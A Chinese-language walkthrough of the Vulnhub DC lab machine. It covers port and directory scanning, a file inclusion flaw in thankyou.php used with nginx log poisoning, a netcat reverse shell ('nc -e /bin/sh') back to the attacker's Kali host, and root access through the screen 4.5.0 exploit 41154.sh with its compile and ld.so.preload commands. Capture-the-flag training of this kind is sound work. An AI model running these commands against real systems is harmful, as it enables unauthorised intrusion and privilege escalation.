Vulnhub靶机渗透测试之DC |
您所在的位置:网站首页 › kali运行python程序 › Vulnhub靶机渗透测试之DC |
Vulnhub简介 Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。 靶场部署vulnhub官网:https://www.vulnhub.com 1、直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本的); 2、解压会得到一个.ova的文件,然后在VMware中打开即可; 环境配置攻击机kali:192.168.2.19 DC靶机:192.168.2.22 (我两者都是用的桥接模式,最好都再做一个快照吧,以防万一) 虚拟机打开如下所示: 1、使用nmap扫描靶机,开放了111端口和80端口 2、111端口没有什么可以利用的点,只有80端口了,访问一下80端口 得知:网站使用的是Nginx的中间件,php语言 3、最终在Contact页面发现一个有交互的地方 4、尝试了很多的方式,由于自己的初心,没有发现问题所在,看了大佬的文章才知道。原来提交的内容之后,刷新thankyou.php页面,下方时间会有变化 5、之后使用DirBuster工具来扫描一下敏感文件 工具的大概使用介绍如下: 使用DirBuster扫描敏感文件,扫描到thankyou.php文件和footer文件,访问一下footer.php文件,发现该文件的内容就是之前提交之后下方显示的时间,这样的话,thankyou.php文件中应该包含了footer.php文件。所以thankyou.php文件应该是存在文件包含漏洞的。 1、在Contact.php页面中填写完表单提交,然后使用bp抓包发送到repeater模块 2、然后不断发包,查看数字也会变化 3、读取/etc/passwd文件,能够读取,看来是确实存在文件包含漏洞的。 4、读取nginx配置文件信息,发现nginx日志记录文件路径 #nginx配置文件路径 /etc/nginx/nginx.conf #nginx日志文件路径 /var/log/nginx/error.log /var/log/nginx/access.log 5、使用burp抓包发送到Repeater模块,然后修改file参数,传入一句话:file= 6、进行包含时nginx的错误日志,利用一句话木马 1、利用一句话来反弹shell 首先在kali机上设置监听:nc -nlvp 1234 然后使用一句话 nc -e /bin/sh IP port 来反弹
3、查看系统相关的一些信息 3、查找具有SUID权限的文件 这两个命令都可以查找 find / -user root -perm -4000 -print 2>/dev/null find / -perm -u=s -type f 2>/dev/null suid用来提权的一般有:Nmap 、Vim、 find、 Bash、 More 、Less、 Nano 、cp 但是都没有这些命令,有一个奇怪的screen-4.5.0,所以可以用这个来提权 1、使用命令searchsploit来查询漏洞利用的脚本 searchsploit screen 4.5.0 2、利用POC这个脚本,将其先复制出来 cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh 3、查看一下脚本的使用 大概的步骤是分别将两部分的c代码编译为可执行文件,然后将其上传的靶机,按照提示的命令进行提权 第一步 将第一部分的c代码放入libhax.c文件中进行编译 命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c 第二步 将第二部分c代码放入rootshell.c文件中进行编译 命令:gcc -o /tmp/rootshell /tmp/rootshell.c 第三步 将编译好的可执行文件上传到靶机的tmp目录下 第四步 按照脚本提示的命令进行提权 步骤一:直接复制下面红线框中的代码,然后再终端中输入,就可以建立libhax.c和rootshell.c两个文件 步骤二:使用以下命令编译c文件 命令:gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c 命令:gcc -o /tmp/rootshell /tmp/rootshell.c 步骤三:通过nc将文件传输到目标机的tmp文件夹(记得kali和靶机都是在tmp目录下进行操作,因为tmp目录的权限很大) kali:(kali的终端连接之后再断开,就可以在靶机的shell里面看到传输完毕了) nc -nlvp 1234 < libhax.so nc -nlvp 1234 < rootshell 目标机: nc 192.168.2.19(kali的ip)1234 > libhax.so nc 192.168.2.19(kali的ip)1234 > rootshell步骤四: 根据提权说明 首先输入命令:cd /etc 然后输入命令:umask 000 然后输入命令:screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" 然后输入命令:screen -ls 最后输入命令:/tmp/rootshell,成功提权 得到flag,在root目录下 1、端口扫描,熟悉常见的端口 2、目录扫描,工具有:御剑、dirsearch、DirBuster等等 3、文件包含漏洞及其利用 4、searchsploit命令的使用 5、screen提权 参考链接 https://www.cnblogs.com/sym945/p/13890266.html https://blog.csdn.net/weixin_44740530/article/details/106401834 |
今日新闻 |
推荐新闻 |
CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3 |